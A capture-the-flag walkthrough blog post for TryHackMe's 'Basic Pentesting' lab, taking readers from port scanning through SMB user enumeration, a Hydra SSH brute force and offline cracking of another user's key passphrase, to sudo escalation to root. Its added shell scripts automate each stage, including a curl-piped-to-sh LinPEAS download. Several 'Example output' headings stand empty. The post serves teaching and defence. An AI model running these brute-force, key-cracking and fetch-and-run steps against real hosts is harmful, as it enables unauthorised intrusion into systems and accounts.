CTFEasy

TryHackMe Basic Pentesting Walkthrough: Enumeration to Root

ducky
2026-05-21

TryHackMe Basic Pentesting Walkthrough: Enumeration to Root (With Command Output)

Basic Pentesting is one of TryHackMe's most popular Easy rooms because it walks you through a complete, realistic workflow: scan the box, enumerate a web server and SMB, discover usernames, brute-force SSH with Hydra, crack the passphrase on an encrypted SSH key with John the Ripper to pivot to a second user, and finally escalate to root.

This version of the guide shows the commands and example output at each stage, so you know exactly what to look for on your own run.

The terminal output below is illustrative — IPs, hostnames, and timing will differ on your machine. Cracked passwords, key passphrases, and flags are redacted ([REDACTED] / THM{...}) so you still earn them. Replace <IP> with your target's IP and <YOUR_IP> with your TryHackMe VPN IP (tun0).

Tools you'll use: rustscan, nmap, gobuster, enum4linux, hydra, ssh, ssh2john, and john.


Task 1 — Deploy & Recon

Start the machine, connect via the TryHackMe VPN (or AttackBox), and note the target IP.

Step 1 — Fast port scan with Rustscan

Rustscan sweeps all 65,535 ports quickly, then hands only the open ones to nmap for service and script scanning:

Example output (trimmed):

Step 2 — Detailed scan with nmap

If you prefer to run nmap separately (or scope it to the ports Rustscan found):

Example output (key lines):

Reading the results: we have SSH (22), an Apache web server (80), Samba/SMB (139/445), and Tomcat (8080). Multiple services = multiple enumeration angles. SMB is especially interesting because it often leaks usernames.
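The same scan chain as shell functions, added here as an example and not part of the original walkthrough. The useful piece is a parser for nmap's grepable output (-oG): it turns the Host: line into "port/service" pairs so the open ports can be fed to a scoped nmap run and each service mapped to its enumeration step instead of being copied by hand. Assumptions: rustscan and nmap are on PATH, TARGET holds the room's IP, and the sample .gnmap line is constructed (made-up 10.10.0.5 address, no version strings).

```shell
#!/bin/sh
# Added example, not from the original walkthrough: Task 1 scan chain plus a
# parser for nmap -oG output. Assumptions: rustscan/nmap on PATH, TARGET set.

TARGET="${TARGET:-<IP>}"

# Step 1: Rustscan sweeps all 65,535 ports and hands only the open ones to
# nmap; everything after "--" is passed through to nmap unchanged.
fast_scan() {
    rustscan -a "$TARGET" --ulimit 5000 -- -sC -sV -oG scan.gnmap
}

# Step 2: a scoped nmap run. $1 is a comma-separated port list such as
# "22,80,139,445,8080"; -oG writes the grepable form the parser below reads.
detail_scan() {
    nmap -sC -sV -p "$1" -oG scan.gnmap "$TARGET"
}

# Print "port/service" for every open port in an nmap -oG file. The Ports:
# field of a Host: line is a comma-separated list of
# port/state/protocol/owner/service/rpcinfo/version/ entries.
open_services_from_gnmap() {
    awk '
        BEGIN { FS = "\t" }
        /^Host:/ {
            for (i = 1; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entry, ", ")
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open") print f[1] "/" f[5]
                }
            }
        }' "$1"
}

# Same data as a comma-separated port list, ready for nmap -p.
open_ports_from_gnmap() {
    open_services_from_gnmap "$1" | cut -d/ -f1 | paste -s -d ,
}

# Map each open service to the enumeration step the walkthrough uses for it.
enumeration_plan() {
    open_services_from_gnmap "$1" | while IFS=/ read -r port svc; do
        case "$svc" in
            http)        echo "$port: gobuster dir -u http://$TARGET:$port/ -w <wordlist>" ;;
            netbios-ssn) echo "$port: enum4linux -a $TARGET" ;;
            ssh)         echo "$port: hydra once a username is known" ;;
            *)           echo "$port: review manually ($svc)" ;;
        esac
    done
}

# Constructed sample of what -oG produces for this box's port set (fake IP).
SAMPLE_GNMAP=$(mktemp)
printf 'Host: 10.10.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//netbios-ssn///, 8080/open/tcp//http///\tIgnored State: closed (65530)\n' > "$SAMPLE_GNMAP"

open_ports_from_gnmap "$SAMPLE_GNMAP"    # 22,80,139,445,8080
enumeration_plan "$SAMPLE_GNMAP"
```

On a live run, call fast_scan, then open_ports_from_gnmap scan.gnmap to get the list for detail_scan, and enumeration_plan scan.gnmap to see which of the following tasks apply to which port.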


Task 2 — Web Enumeration

Visit http://<IP>/ — it's a basic "under maintenance" page. Always check the page source for hints:

Example output:

That hint points at a dev section. Brute-force directories with Gobuster:

Example output:

Open /development/ and read the files inside:

Example output:

Reading the results: two correspondents (initials K and J), confirmation that SMB is in use, and a big hint that user "J" has a weak password. That tells us exactly whom to target with Hydra.
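Task 2 as shell functions, added as an example that is not part of the original walkthrough. The hint on the maintenance page lives in an HTML comment, so html_comments() extracts every <!-- ... --> block from a page instead of relying on a manual view-source; dir_brute() is the gobuster run and dev_notes() pulls each file out of the directory it finds. Assumptions: curl and gobuster are on PATH, TARGET is the room's IP, WORDLIST is Kali's default dirbuster list, the directory index is Apache's autoindex page, and the sample HTML below is constructed with a placeholder comment rather than the real hint.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: Task 2 (page-source hints,
# gobuster, reading the dev directory). Assumptions: curl/gobuster on PATH,
# TARGET set, Apache autoindex on the discovered directory.

TARGET="${TARGET:-<IP>}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}"

# Read HTML on stdin, print the body of each <!-- ... --> comment on its own
# line with whitespace collapsed. index()/substr() rather than a regex, so it
# copes with comments that span lines or contain '>' characters.
html_comments() {
    tr '\n' ' ' | awk '{
        s = $0
        while ((i = index(s, "<!--")) > 0) {
            s = substr(s, i + 4)
            j = index(s, "-->")
            if (j == 0) break
            c = substr(s, 1, j - 1)
            gsub(/[ \t]+/, " ", c); sub(/^ /, "", c); sub(/ $/, "", c)
            print c
            s = substr(s, j + 3)
        }
    }'
}

# The "always check the page source" step, automated.
page_hints() {
    curl -s "http://$TARGET/" | html_comments
}

# Directory brute force; -x adds a few file extensions worth trying.
dir_brute() {
    gobuster dir -u "http://$TARGET/" -w "$WORDLIST" -x txt,html,php
}

# Fetch every file linked from a discovered directory (default /development/).
# The href filter skips Apache's sort links (?C=...) and the parent link (/).
dev_notes() {
    dir="${1:-development}"
    curl -s "http://$TARGET/$dir/" \
      | sed -n 's/.*href="\([^"?/][^"]*\)".*/\1/p' \
      | while read -r f; do
            printf '== %s ==\n' "$f"
            curl -s "http://$TARGET/$dir/$f"
        done
}

# Constructed sample page (two comments, one spanning lines) for an offline run.
SAMPLE_HTML='<html><head><title>Maintenance</title></head>
<body>
<p>Site under maintenance, check back later.</p>
<!-- constructed sample: check the dev section -->
<!-- second note
     spanning lines -->
</body></html>'

printf '%s\n' "$SAMPLE_HTML" | html_comments
```

Against the live box, page_hints replaces the view-source step, dir_brute replaces the gobuster line, and dev_notes prints each note in /development/ with a header so the two initials and the weak-password remark are easy to spot.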


Task 3 — SMB Enumeration

Since SMB is running, enumerate it to pull usernames before any noisy brute-forcing. enum4linux automates Samba/Windows enumeration:

Example output (the part that matters):

Reading the results: two real usernames — kay and jan. The dev note said J had the weak password, so jan is our brute-force target.


Task 4 — Brute-Force SSH with Hydra

Use Hydra to try passwords from rockyou.txt against SSH for jan:

  • -l jan → single username
  • -P → password wordlist
  • -t 4 → 4 parallel tasks (gentler on SSH)
  • -f → stop after the first valid hit

Example output:

Log in with the recovered password:
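Tasks 3 and 4 together as one script, added as an example that is not part of the original walkthrough: harvest local usernames from enum4linux output, pick the one whose initial matches the dev note, run Hydra with the flags discussed above, and pull the password out of Hydra's result line so it is not retyped by hand. Assumptions: enum4linux and hydra are on PATH, rockyou.txt is at Kali's default path, TARGET is the room's IP, and both sample outputs are constructed (fake IP, placeholder password).

```shell
#!/bin/sh
# Added example, not from the original walkthrough: Task 3 (enum4linux) and
# Task 4 (Hydra) chained. Assumptions: tools on PATH, TARGET set, sample
# outputs constructed with a placeholder password.

TARGET="${TARGET:-<IP>}"
ROCKYOU="${ROCKYOU:-/usr/share/wordlists/rockyou.txt}"

# enum4linux lists local accounts as lines like  user:[kay] rid:[0x3e8]  ;
# keep the names, de-duplicated, in first-seen order.
users_from_enum4linux() {
    sed -n 's/^user:\[\([^]]*\)\].*/\1/p' | awk '!seen[$0]++'
}

# First username starting with the initial from the dev note (case-insensitive).
target_by_initial() {
    grep -i "^$1" | head -n 1
}

enumerate_smb() {
    enum4linux -a "$TARGET" | tee enum4linux.out | users_from_enum4linux | tee users.txt
}

# -l single user, -P wordlist, -t 4 parallel tasks (SSH tolerates few more),
# -f stop at the first valid password.
ssh_bruteforce() {
    hydra -l "$1" -P "$ROCKYOU" -t 4 -f "ssh://$TARGET" | tee "hydra_$1.out"
}

# Hydra prints a hit as:  [22][ssh] host: <ip>   login: <user>   password: <pw>
# Print only the password.
password_from_hydra() {
    sed -n 's/^\[22\]\[ssh\].*login: *[^ ]* *password: *\(.*\)$/\1/p'
}

# End-to-end: enumerate, choose the target by initial (default j), brute-force,
# then open the SSH session.
attack() {
    user=$(enumerate_smb | target_by_initial "${1:-j}")
    [ -n "$user" ] || { echo "no username with initial ${1:-j}" >&2; return 1; }
    pw=$(ssh_bruteforce "$user" | password_from_hydra)
    echo "$user:$pw"
    ssh "$user@$TARGET"
}

# Constructed stand-in for the relevant part of enum4linux -a output.
SAMPLE_ENUM4LINUX='[+] Enumerating users using SID S-1-22-1 and logon username "", password ""
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]
user:[kay] rid:[0x3e8]'

# Constructed stand-in for Hydra output (fake IP, placeholder password).
SAMPLE_HYDRA='[DATA] attacking ssh://10.10.0.5:22/
[22][ssh] host: 10.10.0.5   login: jan   password: placeholder-not-real
1 of 1 target successfully completed, 1 valid password found'

printf '%s\n' "$SAMPLE_ENUM4LINUX" | users_from_enum4linux
printf '%s\n' "$SAMPLE_ENUM4LINUX" | users_from_enum4linux | target_by_initial j    # jan
printf '%s\n' "$SAMPLE_HYDRA" | password_from_hydra
```

Running attack on the live box does the whole of Tasks 3 and 4; the tee calls keep enum4linux.out, users.txt and hydra_jan.out on disk so the evidence for the report does not depend on scrollback.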


Task 5 — Pivot to the Second User (Crack the SSH Key)

jan is a low-privilege user. Look around the other home directories: kay's .ssh folder, and the id_rsa inside it, are readable by everyone, so jan can copy the private key:

Example output:

Copy the contents of id_rsa to your own machine as kay_id_rsa. It's passphrase-protected, so convert it to a John-format hash with ssh2john and crack the passphrase offline with John the Ripper:

Example output:

Lock down the key's permissions (chmod 600; ssh refuses a private key that other users can read) and SSH in as kay, entering the cracked passphrase when prompted:

In kay's home directory you'll find the user-related backup file and the flag:
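The Task 5 pivot as a script, added as an example that is not part of the original walkthrough: fetch kay's key over the jan session, convert it with ssh2john, crack it with john, read the passphrase back from `john --show`, then fix the key's mode before handing it to ssh. Assumptions: ssh2john.py is at /usr/share/john/ssh2john.py (the Kali path; adjust for your distro), rockyou.txt is at its default path, TARGET is the room's IP, and the sample `john --show` output is constructed with a placeholder passphrase.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: Task 5 key crack and pivot.
# Assumptions: ssh2john path as below, rockyou at default path, TARGET set,
# sample john output constructed with a placeholder passphrase.

TARGET="${TARGET:-<IP>}"
ROCKYOU="${ROCKYOU:-/usr/share/wordlists/rockyou.txt}"
SSH2JOHN="${SSH2JOHN:-/usr/share/john/ssh2john.py}"
KEY="${KEY:-kay_id_rsa}"

# Copy the world-readable key without retyping it; ssh prompts for jan's password.
fetch_key() {
    ssh "jan@$TARGET" 'cat /home/kay/.ssh/id_rsa' > "$KEY"
}

# Private keys must be 0600 or ssh rejects them ("UNPROTECTED PRIVATE KEY FILE").
lockdown_key() {
    chmod 600 "$1"
}

# Permission string of a file, e.g. -rw------- (ls is more portable than stat -c).
key_mode() {
    ls -l "$1" | cut -c1-10
}

# `john --show` prints  <file>:<passphrase>  followed by a "N password hashes
# cracked" summary; keep everything after the first colon of the first hit.
passphrase_from_john_show() {
    awk '/^[^:]+:/ { sub(/^[^:]*:/, ""); print; exit }'
}

crack_passphrase() {
    python3 "$SSH2JOHN" "$KEY" > "$KEY.hash"
    john --wordlist="$ROCKYOU" "$KEY.hash"
    john --show "$KEY.hash" | passphrase_from_john_show
}

# Full pivot: fetch, crack, lock down, log in as kay (ssh asks for the passphrase).
pivot_to_kay() {
    fetch_key
    echo "passphrase: $(crack_passphrase)"
    lockdown_key "$KEY"
    ssh -i "$KEY" "kay@$TARGET"
}

# Constructed stand-in for `john --show` output (placeholder passphrase).
SAMPLE_JOHN_SHOW='kay_id_rsa:placeholder-not-real

1 password hash cracked, 0 left'

printf '%s\n' "$SAMPLE_JOHN_SHOW" | passphrase_from_john_show

# Offline demonstration of the permission fix on a scratch file.
SCRATCH_KEY=$(mktemp)
lockdown_key "$SCRATCH_KEY"
key_mode "$SCRATCH_KEY"    # -rw-------
```

Once in, cat the backup file and the flag in kay's home directory; the backup file is what makes the next task short.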


Task 6 — Privilege Escalation to Root

With a foothold as kay, check what you can do. The fastest first checks:

Example sudo -l output:

For automated enumeration, LinPEAS highlights misconfigurations for you:

Follow the highlighted vector (here, the credential stored in pass.bak combined with kay's sudo rights) to become root, then grab the final flag:
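The Task 6 checks as functions, added as an example that is not part of the original walkthrough: the manual sudo and SUID checks, a classifier for `sudo -l` output so a full-sudo entry cannot be missed in a long listing, and the LinPEAS fetch. The same functions serve as the self-audit suggested under "What You Learned". Assumptions: run on the target as the foothold user; the LinPEAS URL is the PEASS-ng project's release download; the sample `sudo -l` outputs are constructed and use "target" as the hostname.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: Task 6 privilege escalation
# checks. Assumptions: run as the foothold user on the target; sample sudo -l
# outputs are constructed.

# What the current user may run via sudo (sudo asks for the user's own password,
# which on this box is what the backup file in kay's home directory holds).
sudo_rights() { sudo -l; }

# SUID binaries: compare against a stock install; anything extra is a lead.
suid_binaries() { find / -perm -u=s -type f 2>/dev/null; }

# Automated enumeration; the output is long, so tee it to a file.
run_linpeas() {
    curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh | tee linpeas.out
}

# Tag each command entry under "User X may run the following commands":
#   FULL      (ALL) ALL or (ALL : ALL) NOPASSWD: ALL  -> sudo -i and done
#   NOPASSWD  specific commands that need no password
#   LIMITED   everything else (check GTFOBins for the named binary)
classify_sudo() {
    awk '
        /^User .* may run the following commands on/ { inlist = 1; next }
        inlist && /^[ \t]*\(/ {
            line = $0; sub(/^[ \t]+/, "", line)
            if (line ~ /\) *(NOPASSWD: *)?ALL$/)  tag = "FULL"
            else if (line ~ /NOPASSWD:/)          tag = "NOPASSWD"
            else                                  tag = "LIMITED"
            print tag "\t" line
        }'
}

# The escalation this box allows: kay's sudo rights plus the password from the
# backup file. sudo -i gives a root login shell.
become_root() {
    sudo_rights | classify_sudo
    sudo -i
}

# Constructed `sudo -l` outputs: the full-sudo case and a restricted one.
SAMPLE_SUDO_FULL='Matching Defaults entries for kay on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User kay may run the following commands on target:
    (ALL : ALL) ALL'

SAMPLE_SUDO_LIMITED='User someone may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less'

printf '%s\n' "$SAMPLE_SUDO_FULL" | classify_sudo
printf '%s\n' "$SAMPLE_SUDO_LIMITED" | classify_sudo
```

A FULL tag means the password from pass.bak is all that stands between kay and root; a NOPASSWD or LIMITED entry would instead send you to the named binary's escape tricks, which this box does not need.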

🎉 Box rooted!


Summary: The Attack Path

Stage                 | Tool / Technique   | Result
----------------------|--------------------|----------------------------------
Recon                 | rustscan -> nmap   | Found SSH, HTTP, SMB, Tomcat
Web enum              | gobuster           | Found /development/ + dev notes
SMB enum              | enum4linux         | Discovered kay and jan
Credential attack     | hydra              | Cracked jan's SSH password
Pivot                 | ssh2john + john    | Cracked kay's SSH key passphrase
Privilege escalation  | sudo -l / LinPEAS  | Root

What You Learned (and How to Defend It)

Basic Pentesting is a chain of small misconfigurations — exactly how real breaches happen:

  • Don't leave hints in web roots. Dev notes, version numbers, and "to-do" files give attackers a roadmap.
  • Lock down SMB. Anonymous (null-session) access lets enum4linux list local accounts, which turns slow, blind brute-forcing into a targeted attack on a known user.
  • Enforce strong passwords. A password that appears in rockyou.txt falls to Hydra quickly, and nothing on this box rate-limits or locks out repeated SSH failures.
  • Protect private keys. A world-readable id_rsa plus a weak passphrase is game over: ssh2john extracts the hash and john cracks it offline, with no lockout and no trace on the target.
  • Audit sudo and SUID. Run sudo -l, find / -perm -u=s -type f, and tools like LinPEAS on your own hosts before an attacker does, and never leave a password in a backup file in a home directory.

Handy Reference Commands


For educational use only. TryHackMe is a legal, sandboxed lab. Never use these techniques against systems you don't own or aren't explicitly authorised to test.
